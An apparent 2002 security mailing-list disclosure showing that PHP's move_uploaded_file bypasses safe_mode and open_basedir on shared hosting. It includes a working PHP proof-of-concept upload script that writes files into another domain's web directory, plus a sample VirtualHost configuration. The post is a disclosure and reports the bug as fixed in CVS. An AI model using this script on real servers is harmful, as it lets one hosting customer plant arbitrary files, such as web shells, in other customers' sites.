Hey Its possible to circumvent (probadly spelled wrong) PHP safe_mode restrictions by using move_uploaded_file. You take this nasty script (and you have domain whatever.com and your directory path is /domains/whatever.com/ ) <? $file = $HTTP_POST_FILES['file']['name']; $type = $HTTP_POST_FILES['file']['type']; $size = $HTTP_POST_FILES['file']['size']; $temp = $HTTP_POST_FILES['file']['tmp_name']; $size_limit = "100000"; // set size limit in bytes if ($file){ if ($size < $size_limit){ move_uploaded_file($temp, "/domains/somebodyelse.org/public_html/www/test/".$file); echo "The file <tt>$file</tt> was sucessfully uploaded"; } else { echo "Sorry, your file exceeds the size limit of $size_limit bytes"; }} echo " <form enctype='multipart/form-data' action=$PHP_SELF method=post> Upload a file: <input name='file' type='file'> <input type='submit' value='Upload'> </form> "; ?> As you can see, he moved the uploaded file to: "/domains/somebodyelse.org/public_html/www/test/" while the user is restricted with both safe_mode and open_basedir. Virtualhost configuration snippet: <VirtualHost IP_HERE> DocumentRoot /domains/whatever.com/public_html/root/ ServerName root.whatever.com CustomLog /domains/whatever.com/logs/access_log combined ErrorLog /domains/whatever.com/logs/error_log php_admin_value safe_mode 1 php_admin_value open_basedir /domains/whatever.com/public_html/root/ </VirtualHost> As you can see I have both set safe_mode and the open_basedir restriction but this user is able to upload any file where the apache user has write access. PHP.net is notified, and the bug has been fixed in CVS. However, I am unable to compile the CVS version atm. Gives alot of 'make' errors. Thanks go out to bastijs for pointing this out to me. Bye, Tozz
This archive was generated by hypermail 2b30 : Tue Mar 19 2002 - 19:34:48 PST